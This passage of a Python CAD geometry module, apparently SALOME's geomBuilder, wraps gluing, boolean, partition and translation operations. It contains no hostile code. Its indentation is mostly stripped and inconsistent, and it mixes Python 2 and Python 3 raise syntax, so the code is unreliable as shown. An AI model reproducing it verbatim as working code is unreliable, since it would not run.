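#
#   b1    = geompy.MakeBoxDXDYDZ(100, 100, 100)
#   b2    = geompy.MakeTranslation(b1, 100, 0, 0)
#   comp  = geompy.MakeCompound([b1, b2])
#   glued = geompy.MakeGlueFaces(comp, 1e-7, True, "gluedBoxes")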
## Find coincident faces in theShape for possible gluing.
# @param theShape Initial shape.
# @param theTolerance Maximum distance between faces,
# which can be considered as coincident.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return GEOM.ListOfGO
#
# @ref tui_glue_faces "Example"
@ManageTransactions("ShapesOp")
def GetGlueFaces(self, theShape, theTolerance, theName=None):
"""
Find coincident faces in theShape for possible gluing.
Parameters:
theShape Initial shape.
theTolerance Maximum distance between faces,
which can be considered as coincident.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
GEOM.ListOfGO
"""
anObj = self.ShapesOp.GetGlueFaces(theShape, theTolerance)
RaiseIfFailed("GetGlueFaces", self.ShapesOp)
self._autoPublish(anObj, theName, "facesToGlue")
return anObj
## Replace coincident faces in theShape by one face
# in compliance with given list of faces
# @param theShape Initial shape.
# @param theTolerance Maximum distance between faces,
# which can be considered as coincident.
# @param theFaces List of faces for gluing.
# @param doKeepNonSolids If FALSE, only solids will present in the result,
# otherwise all initial shapes.
# @param doGlueAllEdges If TRUE, all coincident edges of <VAR>theShape</VAR>
# will be glued, otherwise only the edges,
# belonging to <VAR>theFaces</VAR>.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing a copy of theShape
# without some faces.
#
# @ref tui_glue_faces "Example"
@ManageTransactions("ShapesOp")
def MakeGlueFacesByList(self, theShape, theTolerance, theFaces,
doKeepNonSolids=True, doGlueAllEdges=True, theName=None):
"""
Replace coincident faces in theShape by one face
in compliance with given list of faces
Parameters:
theShape Initial shape.
theTolerance Maximum distance between faces,
which can be considered as coincident.
theFaces List of faces for gluing.
doKeepNonSolids If FALSE, only solids will present in the result,
otherwise all initial shapes.
doGlueAllEdges If TRUE, all coincident edges of theShape
will be glued, otherwise only the edges,
belonging to theFaces.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing a copy of theShape
without some faces.
"""
anObj = self.ShapesOp.MakeGlueFacesByList(theShape, theTolerance, theFaces,
doKeepNonSolids, doGlueAllEdges)
if anObj is None:
raise RuntimeError, "MakeGlueFacesByList : " + self.ShapesOp.GetErrorCode()
self._autoPublish(anObj, theName, "glueFaces")
return anObj
## Replace coincident edges in theShape by one edge.
# @param theShape Initial shape.
# @param theTolerance Maximum distance between edges, which can be considered as coincident.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing a copy of theShape without coincident edges.
#
# @ref tui_glue_edges "Example"
@ManageTransactions("ShapesOp")
def MakeGlueEdges(self, theShape, theTolerance, theName=None):
"""
Replace coincident edges in theShape by one edge.
Parameters:
theShape Initial shape.
theTolerance Maximum distance between edges, which can be considered as coincident.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing a copy of theShape without coincident edges.
"""
            theTolerance, Parameters = ParseParameters(theTolerance)
            anObj = self.ShapesOp.MakeGlueEdges(theShape, theTolerance)
            if anObj is None:
                raise RuntimeError("MakeGlueEdges : " + self.ShapesOp.GetErrorCode())
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "glueEdges")
return anObj
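        # Illustrative usage sketch (hypothetical names): glue all coincident
        # edges of a compound built from two adjacent shapes.
        #
        #   comp = geompy.MakeCompound([box1, box2])
        #   glued = geompy.MakeGlueEdges(comp, 1.e-7, theName="gluedEdges")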
## Find coincident edges in theShape for possible gluing.
# @param theShape Initial shape.
# @param theTolerance Maximum distance between edges,
# which can be considered as coincident.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return GEOM.ListOfGO
#
# @ref tui_glue_edges "Example"
@ManageTransactions("ShapesOp")
def GetGlueEdges(self, theShape, theTolerance, theName=None):
"""
Find coincident edges in theShape for possible gluing.
Parameters:
theShape Initial shape.
theTolerance Maximum distance between edges,
which can be considered as coincident.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
GEOM.ListOfGO
"""
anObj = self.ShapesOp.GetGlueEdges(theShape, theTolerance)
RaiseIfFailed("GetGlueEdges", self.ShapesOp)
self._autoPublish(anObj, theName, "edgesToGlue")
return anObj
## Replace coincident edges in theShape by one edge
# in compliance with given list of edges.
# @param theShape Initial shape.
# @param theTolerance Maximum distance between edges,
# which can be considered as coincident.
# @param theEdges List of edges for gluing.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing a copy of theShape
# without some edges.
#
# @ref tui_glue_edges "Example"
@ManageTransactions("ShapesOp")
def MakeGlueEdgesByList(self, theShape, theTolerance, theEdges, theName=None):
"""
Replace coincident edges in theShape by one edge
in compliance with given list of edges.
Parameters:
theShape Initial shape.
theTolerance Maximum distance between edges,
which can be considered as coincident.
theEdges List of edges for gluing.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing a copy of theShape
without some edges.
"""
anObj = self.ShapesOp.MakeGlueEdgesByList(theShape, theTolerance, theEdges)
            if anObj is None:
                raise RuntimeError("MakeGlueEdgesByList : " + self.ShapesOp.GetErrorCode())
self._autoPublish(anObj, theName, "glueEdges")
return anObj
# end of l3_healing
## @}
## @addtogroup l3_boolean Boolean Operations
## @{
# -----------------------------------------------------------------------------
# Boolean (Common, Cut, Fuse, Section)
# -----------------------------------------------------------------------------
## Perform one of boolean operations on two given shapes.
# @param theShape1 First argument for boolean operation.
# @param theShape2 Second argument for boolean operation.
# @param theOperation Indicates the operation to be done:\n
# 1 - Common, 2 - Cut, 3 - Fuse, 4 - Section.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fuse "Example"
@ManageTransactions("BoolOp")
def MakeBoolean(self, theShape1, theShape2, theOperation, checkSelfInte=False, theName=None):
"""
Perform one of boolean operations on two given shapes.
Parameters:
theShape1 First argument for boolean operation.
theShape2 Second argument for boolean operation.
theOperation Indicates the operation to be done:
1 - Common, 2 - Cut, 3 - Fuse, 4 - Section.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.BoolOp.MakeBoolean(theShape1, theShape2, theOperation, checkSelfInte)
RaiseIfFailed("MakeBoolean", self.BoolOp)
def_names = { 1: "common", 2: "cut", 3: "fuse", 4: "section" }
self._autoPublish(anObj, theName, def_names[theOperation])
return anObj
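        # Illustrative usage sketch (hypothetical names): cut a cylinder out of
        # a box via the generic operation code (2 = Cut).
        #
        #   box = geompy.MakeBoxDXDYDZ(100., 100., 100.)
        #   cyl = geompy.MakeCylinderRH(30., 200.)
        #   cut = geompy.MakeBoolean(box, cyl, 2, theName="boxMinusCyl")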
## Perform Common boolean operation on two given shapes.
# @param theShape1 First argument for boolean operation.
# @param theShape2 Second argument for boolean operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_common "Example 1"
# \n @ref swig_MakeCommon "Example 2"
def MakeCommon(self, theShape1, theShape2, checkSelfInte=False, theName=None):
"""
Perform Common boolean operation on two given shapes.
Parameters:
theShape1 First argument for boolean operation.
theShape2 Second argument for boolean operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.MakeBoolean()
return self.MakeBoolean(theShape1, theShape2, 1, checkSelfInte, theName)
## Perform Cut boolean operation on two given shapes.
# @param theShape1 First argument for boolean operation.
# @param theShape2 Second argument for boolean operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_cut "Example 1"
# \n @ref swig_MakeCommon "Example 2"
def MakeCut(self, theShape1, theShape2, checkSelfInte=False, theName=None):
"""
Perform Cut boolean operation on two given shapes.
Parameters:
theShape1 First argument for boolean operation.
theShape2 Second argument for boolean operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.MakeBoolean()
return self.MakeBoolean(theShape1, theShape2, 2, checkSelfInte, theName)
## Perform Fuse boolean operation on two given shapes.
# @param theShape1 First argument for boolean operation.
# @param theShape2 Second argument for boolean operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param rmExtraEdges The flag that tells if Remove Extra Edges
# operation should be performed during the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fuse "Example 1"
# \n @ref swig_MakeCommon "Example 2"
@ManageTransactions("BoolOp")
def MakeFuse(self, theShape1, theShape2, checkSelfInte=False,
rmExtraEdges=False, theName=None):
"""
Perform Fuse boolean operation on two given shapes.
Parameters:
theShape1 First argument for boolean operation.
theShape2 Second argument for boolean operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
rmExtraEdges The flag that tells if Remove Extra Edges
operation should be performed during the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BoolOp.MakeFuse(theShape1, theShape2,
checkSelfInte, rmExtraEdges)
RaiseIfFailed("MakeFuse", self.BoolOp)
self._autoPublish(anObj, theName, "fuse")
return anObj
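        # Illustrative usage sketch (hypothetical names): fuse two overlapping
        # solids and remove the extra edges produced by the fuse.
        #
        #   fused = geompy.MakeFuse(box, cyl, rmExtraEdges=True, theName="fused")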
## Perform Section boolean operation on two given shapes.
# @param theShape1 First argument for boolean operation.
# @param theShape2 Second argument for boolean operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_section "Example 1"
# \n @ref swig_MakeCommon "Example 2"
def MakeSection(self, theShape1, theShape2, checkSelfInte=False, theName=None):
"""
Perform Section boolean operation on two given shapes.
Parameters:
theShape1 First argument for boolean operation.
theShape2 Second argument for boolean operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.MakeBoolean()
return self.MakeBoolean(theShape1, theShape2, 4, checkSelfInte, theName)
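        # Illustrative usage sketch (hypothetical names): the section of two
        # overlapping solids is the set of edges where their boundaries intersect.
        #
        #   sec = geompy.MakeSection(box, cyl, theName="section")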
## Perform Fuse boolean operation on the list of shapes.
# @param theShapesList Shapes to be fused.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param rmExtraEdges The flag that tells if Remove Extra Edges
# operation should be performed during the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_fuse "Example 1"
# \n @ref swig_MakeCommon "Example 2"
@ManageTransactions("BoolOp")
def MakeFuseList(self, theShapesList, checkSelfInte=False,
rmExtraEdges=False, theName=None):
"""
Perform Fuse boolean operation on the list of shapes.
Parameters:
theShapesList Shapes to be fused.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
rmExtraEdges The flag that tells if Remove Extra Edges
operation should be performed during the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BoolOp.MakeFuseList(theShapesList, checkSelfInte,
rmExtraEdges)
RaiseIfFailed("MakeFuseList", self.BoolOp)
self._autoPublish(anObj, theName, "fuse")
return anObj
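        # Illustrative usage sketch (hypothetical names): fuse several solids in
        # one call, which avoids chaining pairwise MakeFuse operations.
        #
        #   fused = geompy.MakeFuseList([box, cyl, sphere], theName="fusedAll")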
## Perform Common boolean operation on the list of shapes.
# @param theShapesList Shapes for Common operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_common "Example 1"
# \n @ref swig_MakeCommon "Example 2"
@ManageTransactions("BoolOp")
def MakeCommonList(self, theShapesList, checkSelfInte=False, theName=None):
"""
Perform Common boolean operation on the list of shapes.
Parameters:
theShapesList Shapes for Common operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BoolOp.MakeCommonList(theShapesList, checkSelfInte)
RaiseIfFailed("MakeCommonList", self.BoolOp)
self._autoPublish(anObj, theName, "common")
return anObj
## Perform Cut boolean operation on one object and the list of tools.
# @param theMainShape The object of the operation.
# @param theShapesList The list of tools of the operation.
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_cut "Example 1"
# \n @ref swig_MakeCommon "Example 2"
@ManageTransactions("BoolOp")
def MakeCutList(self, theMainShape, theShapesList, checkSelfInte=False, theName=None):
"""
Perform Cut boolean operation on one object and the list of tools.
Parameters:
theMainShape The object of the operation.
theShapesList The list of tools of the operation.
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BoolOp.MakeCutList(theMainShape, theShapesList, checkSelfInte)
RaiseIfFailed("MakeCutList", self.BoolOp)
self._autoPublish(anObj, theName, "cut")
return anObj
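        # Illustrative usage sketch (hypothetical names): subtract several tool
        # shapes from one object in a single call.
        #
        #   drilled = geompy.MakeCutList(box, [cyl1, cyl2], theName="drilled")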
# end of l3_boolean
## @}
## @addtogroup l3_basic_op
## @{
## Perform partition operation.
# @param ListShapes Shapes to be intersected.
# @param ListTools Shapes to intersect theShapes.
# @param Limit Type of resulting shapes (see ShapeType()).\n
# If this parameter is set to -1 ("Auto"), most appropriate shape limit
# type will be detected automatically.
# @param KeepNonlimitShapes if this parameter == 0, then only shapes of
# target type (equal to Limit) are kept in the result,
# else standalone shapes of lower dimension
# are kept also (if they exist).
#
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Each compound from ListShapes and ListTools will be exploded
# in order to avoid possible intersection between shapes from this compound.
#
        #  Since the implementation of the new version of PartitionAlgo (October 2006),
        #  the other parameters are ignored by the current functionality. They are
        #  kept in this function only to support old versions.
# @param ListKeepInside Shapes, outside which the results will be deleted.
# Each shape from theKeepInside must belong to theShapes also.
# @param ListRemoveInside Shapes, inside which the results will be deleted.
# Each shape from theRemoveInside must belong to theShapes also.
# @param RemoveWebs If TRUE, perform Glue 3D algorithm.
        #  @param ListMaterials Material indices for each shape. Makes sense
        #                       only if RemoveWebs is TRUE.
#
# @return New GEOM.GEOM_Object, containing the result shapes.
#
# @ref tui_partition "Example"
@ManageTransactions("BoolOp")
def MakePartition(self, ListShapes, ListTools=[], ListKeepInside=[], ListRemoveInside=[],
Limit=ShapeType["AUTO"], RemoveWebs=0, ListMaterials=[],
KeepNonlimitShapes=0, theName=None):
"""
Perform partition operation.
Parameters:
ListShapes Shapes to be intersected.
ListTools Shapes to intersect theShapes.
Limit Type of resulting shapes (see geompy.ShapeType)
If this parameter is set to -1 ("Auto"), most appropriate shape limit
type will be detected automatically.
KeepNonlimitShapes if this parameter == 0, then only shapes of
target type (equal to Limit) are kept in the result,
else standalone shapes of lower dimension
are kept also (if they exist).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
Each compound from ListShapes and ListTools will be exploded
in order to avoid possible intersection between shapes from
this compound.
                Since the implementation of the new version of PartitionAlgo (October 2006),
                the other parameters are ignored by the current functionality. They are
                kept in this function only to support old versions.
Ignored parameters:
ListKeepInside Shapes, outside which the results will be deleted.
Each shape from theKeepInside must belong to theShapes also.
ListRemoveInside Shapes, inside which the results will be deleted.
Each shape from theRemoveInside must belong to theShapes also.
RemoveWebs If TRUE, perform Glue 3D algorithm.
                 ListMaterials Material indices for each shape. Makes sense only if RemoveWebs is TRUE.
Returns:
New GEOM.GEOM_Object, containing the result shapes.
"""
# Example: see GEOM_TestAll.py
if Limit == self.ShapeType["AUTO"]:
# automatic detection of the most appropriate shape limit type
lim = GEOM.SHAPE
for s in ListShapes: lim = min( lim, s.GetMaxShapeType() )
Limit = EnumToLong(lim)
pass
anObj = self.BoolOp.MakePartition(ListShapes, ListTools,
ListKeepInside, ListRemoveInside,
Limit, RemoveWebs, ListMaterials,
                                              KeepNonlimitShapes)
RaiseIfFailed("MakePartition", self.BoolOp)
self._autoPublish(anObj, theName, "partition")
return anObj
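        # Illustrative usage sketch (hypothetical names): split a box by a
        # trimmed plane; with Limit="AUTO" the result type is detected
        # automatically (solids here).
        #
        #   p = geompy.MakeVertex(50., 50., 50.)
        #   v = geompy.MakeVectorDXDYDZ(0., 0., 1.)
        #   plane = geompy.MakePlane(p, v, 300.)
        #   parts = geompy.MakePartition([box], [plane], theName="partition")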
## Perform partition operation.
        #  This method may be useful when a partition is needed for a compound
        #  that contains non-intersecting shapes. Performance will be better,
        #  since intersection between shapes from the compound is not performed.
#
# Description of all parameters as in previous method MakePartition().
# One additional parameter is provided:
# @param checkSelfInte The flag that tells if the arguments should
# be checked for self-intersection prior to the operation.
#
# @note This algorithm doesn't find all types of self-intersections.
# It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
# vertex/face and edge/face intersections. Face/face
# intersections detection is switched off as it is a
# time-consuming operation that gives an impact on performance.
# To find all self-intersections please use
# CheckSelfIntersections() method.
#
# @note Passed compounds (via ListShapes or via ListTools)
# have to consist of nonintersecting shapes.
#
# @return New GEOM.GEOM_Object, containing the result shapes.
#
# @ref swig_todo "Example"
@ManageTransactions("BoolOp")
def MakePartitionNonSelfIntersectedShape(self, ListShapes, ListTools=[],
ListKeepInside=[], ListRemoveInside=[],
Limit=ShapeType["AUTO"], RemoveWebs=0,
ListMaterials=[], KeepNonlimitShapes=0,
checkSelfInte=False, theName=None):
"""
Perform partition operation.
            This method may be useful when a partition is needed for a compound
            that contains non-intersecting shapes. Performance will be better,
            since intersection between shapes from the compound is not performed.
Parameters:
Description of all parameters as in method geompy.MakePartition.
One additional parameter is provided:
checkSelfInte The flag that tells if the arguments should
be checked for self-intersection prior to
the operation.
Note:
This algorithm doesn't find all types of self-intersections.
It is tuned to detect vertex/vertex, vertex/edge, edge/edge,
vertex/face and edge/face intersections. Face/face
intersections detection is switched off as it is a
time-consuming operation that gives an impact on performance.
To find all self-intersections please use
CheckSelfIntersections() method.
NOTE:
Passed compounds (via ListShapes or via ListTools)
have to consist of nonintersecting shapes.
Returns:
New GEOM.GEOM_Object, containing the result shapes.
"""
if Limit == self.ShapeType["AUTO"]:
# automatic detection of the most appropriate shape limit type
lim = GEOM.SHAPE
for s in ListShapes: lim = min( lim, s.GetMaxShapeType() )
Limit = EnumToLong(lim)
pass
anObj = self.BoolOp.MakePartitionNonSelfIntersectedShape(ListShapes, ListTools,
ListKeepInside, ListRemoveInside,
Limit, RemoveWebs, ListMaterials,
                                                                     KeepNonlimitShapes, checkSelfInte)
RaiseIfFailed("MakePartitionNonSelfIntersectedShape", self.BoolOp)
self._autoPublish(anObj, theName, "partition")
return anObj
## See method MakePartition() for more information.
#
# @ref tui_partition "Example 1"
# \n @ref swig_Partition "Example 2"
def Partition(self, ListShapes, ListTools=[], ListKeepInside=[], ListRemoveInside=[],
Limit=ShapeType["AUTO"], RemoveWebs=0, ListMaterials=[],
KeepNonlimitShapes=0, theName=None):
"""
See method geompy.MakePartition for more information.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.MakePartition()
anObj = self.MakePartition(ListShapes, ListTools,
ListKeepInside, ListRemoveInside,
Limit, RemoveWebs, ListMaterials,
                                       KeepNonlimitShapes, theName)
return anObj
## Perform partition of the Shape with the Plane
# @param theShape Shape to be intersected.
# @param thePlane Tool shape, to intersect theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_partition "Example"
@ManageTransactions("BoolOp")
def MakeHalfPartition(self, theShape, thePlane, theName=None):
"""
Perform partition of the Shape with the Plane
Parameters:
theShape Shape to be intersected.
thePlane Tool shape, to intersect theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the result shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.BoolOp.MakeHalfPartition(theShape, thePlane)
RaiseIfFailed("MakeHalfPartition", self.BoolOp)
self._autoPublish(anObj, theName, "partition")
return anObj
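        # Illustrative usage sketch (hypothetical names): MakeHalfPartition is a
        # shortcut for splitting a single shape by a single plane.
        #
        #   halves = geompy.MakeHalfPartition(box, plane, theName="halves")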
# end of l3_basic_op
## @}
## @addtogroup l3_transform
## @{
## Translate the given object along the vector, specified
# by its end points.
# @param theObject The object to be translated.
# @param thePoint1 Start point of translation vector.
# @param thePoint2 End point of translation vector.
# @param theCopy Flag used to translate object itself or create a copy.
# @return Translated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the translated object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def TranslateTwoPoints(self, theObject, thePoint1, thePoint2, theCopy=False):
"""
Translate the given object along the vector, specified by its end points.
Parameters:
theObject The object to be translated.
thePoint1 Start point of translation vector.
thePoint2 End point of translation vector.
theCopy Flag used to translate object itself or create a copy.
Returns:
Translated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the translated object if theCopy flag is True.
"""
if theCopy:
anObj = self.TrsfOp.TranslateTwoPointsCopy(theObject, thePoint1, thePoint2)
else:
anObj = self.TrsfOp.TranslateTwoPoints(theObject, thePoint1, thePoint2)
RaiseIfFailed("TranslateTwoPoints", self.TrsfOp)
return anObj
## Translate the given object along the vector, specified
# by its end points, creating its copy before the translation.
# @param theObject The object to be translated.
# @param thePoint1 Start point of translation vector.
# @param thePoint2 End point of translation vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the translated object.
#
# @ref tui_translation "Example 1"
# \n @ref swig_MakeTranslationTwoPoints "Example 2"
@ManageTransactions("TrsfOp")
def MakeTranslationTwoPoints(self, theObject, thePoint1, thePoint2, theName=None):
"""
Translate the given object along the vector, specified
by its end points, creating its copy before the translation.
Parameters:
theObject The object to be translated.
thePoint1 Start point of translation vector.
thePoint2 End point of translation vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
